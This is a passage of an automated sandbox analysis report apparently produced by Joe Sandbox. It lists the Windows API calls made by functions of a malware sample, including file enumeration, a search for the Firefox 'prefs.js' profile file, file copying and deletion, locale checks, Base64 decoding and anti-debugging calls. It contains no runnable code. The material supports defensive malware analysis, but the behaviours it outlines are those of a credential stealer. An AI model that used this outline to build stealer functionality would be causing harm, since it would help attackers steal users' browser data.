                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                      • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                      • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                      • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                      • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                                      • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                                      • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                      • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                      • FindClose.KERNEL32(000000FF), ref: 00401E32
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                      • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                                      • Opcode Fuzzy Hash: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                      • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                      APIs
                                      • wsprintfA.USER32 ref: 0230EFA5
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0230EFBC
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0230F012
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0230F028
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230F515
                                      • FindClose.KERNEL32(000000FF), ref: 0230F52A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction ID: b57ec0aceceee84dfa6a6abd29488d6b0387febf9424de806deb86be1a4fd390
                                      • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction Fuzzy Hash: 3AE1BB72912258AADB7CFB60DD90EEEB73AAF54301F4041D9A50A62491EF306FC9CF51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                      • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                      • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                      • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                      • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0230DD52
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0230DD9A
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0230DDB0
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230E033
                                      • FindClose.KERNEL32(000000FF), ref: 0230E045
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction ID: f78663529de89b34bfe7d7adbe65eed03ecdd9f6f784a9f0b427f73620252438
                                      • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction Fuzzy Hash: 899135729002089BCB28FBB0DE95DEE777EAF95301F40865DE44A961D0EE349B58CF91
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0230F985
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0230F9D6
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0230F9EC
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230FD18
                                      • FindClose.KERNEL32(000000FF), ref: 0230FD2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction ID: 9395b8469c18d492969d58d838a4f450f92753e07b2bb10e3aac7f5a8e390821
                                      • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction Fuzzy Hash: A8B14071A012189BCB38FF60DDA5FEE777AAF55301F4081A9940E96590EF30AB48CF91
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$@
                                      • API String ID: 433455689-2355794846
                                      • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                      • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                      • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                      • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 02301B8A
                                      • StrCmpCA.SHLWAPI(?,00425264), ref: 02301BDA
                                      • StrCmpCA.SHLWAPI(?,0042530C), ref: 02301BF0
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02301FA7
                                      • DeleteFileA.KERNEL32(00000000), ref: 02302031
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02302087
                                      • FindClose.KERNEL32(000000FF), ref: 02302099
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 1415058207-0
                                      • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                      • Instruction ID: 16b00d336b556f0870620bcebcd5bd0774bd36a1f39b32495453c66f8f500b28
                                      • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                      • Instruction Fuzzy Hash: 8212CA71911258ABCB2DFB60DDA4EEEB77AAF54301F4045ADA50A620D0EF746F88CF50
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0230E0C5
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0230E115
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0230E12B
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230E647
                                      • FindClose.KERNEL32(000000FF), ref: 0230E659
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2325840235-0
                                      • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction ID: d846f68130264d367be88f0d946ccf3d5b641af607366ae9f66916d1b5ac4570
                                      • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction Fuzzy Hash: 31F19B719152189ACB3DFB60DDA4EEEB77AAF54301F8045DAA04E62090EF346F89CF51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                      • LocalFree.KERNEL32(00000000), ref: 00417D22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                      • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                      • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                      • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                      APIs
                                      • memset.MSVCRT ref: 0040C853
                                      • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008786D0), ref: 0040C871
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                      • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                      • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                      • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                      • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                      APIs
                                      • memset.MSVCRT ref: 0230CABA
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0230CAD8
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0230CAE3
                                      • memcpy.MSVCRT(?,?,?), ref: 0230CB79
                                      • lstrcat.KERNEL32(?,00420B46), ref: 0230CBAA
                                      • lstrcat.KERNEL32(?,00420B47), ref: 0230CBBE
                                      • lstrcat.KERNEL32(?,00420B4E), ref: 0230CBDF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction ID: f1f8f673bf3a638de196b719db329f2680de9fda1774ca2ac54fcd20434d3749
                                      • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction Fuzzy Hash: AE41607894421AEFDB10DFD0DC98BEEBBB9FB44304F1045A9E509A6280D7745B84CFA1
                                      APIs
                                      • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,008786A0,?,0042110C,?,00000000,?), ref: 0041696C
                                      • sscanf.NTDLL ref: 00416999
                                      • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,008786A0,?,0042110C), ref: 004169B2
                                      • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,008786A0,?,0042110C), ref: 004169C0
                                      • ExitProcess.KERNEL32 ref: 004169DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID: B
                                      • API String ID: 2533653975-2248957098
                                      • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                      • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                      • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                      • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: N@
                                      • API String ID: 4291131564-4229412743
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02317E48
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02317E60
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 02317E74
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02317EC9
                                      • LocalFree.KERNEL32(00000000), ref: 02317F89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID:
                                      • API String ID: 3090951853-0
                                      • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction ID: 7d3fe78dde39546042320d664619cea79417313b85f3fb67e3fc1bf4864bfbb3
                                      • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction Fuzzy Hash: 55414C71941218ABDB28DF94DD88FEEB7B9FB48705F1041D9E00AA6190DB742F85CFA0
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                      • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
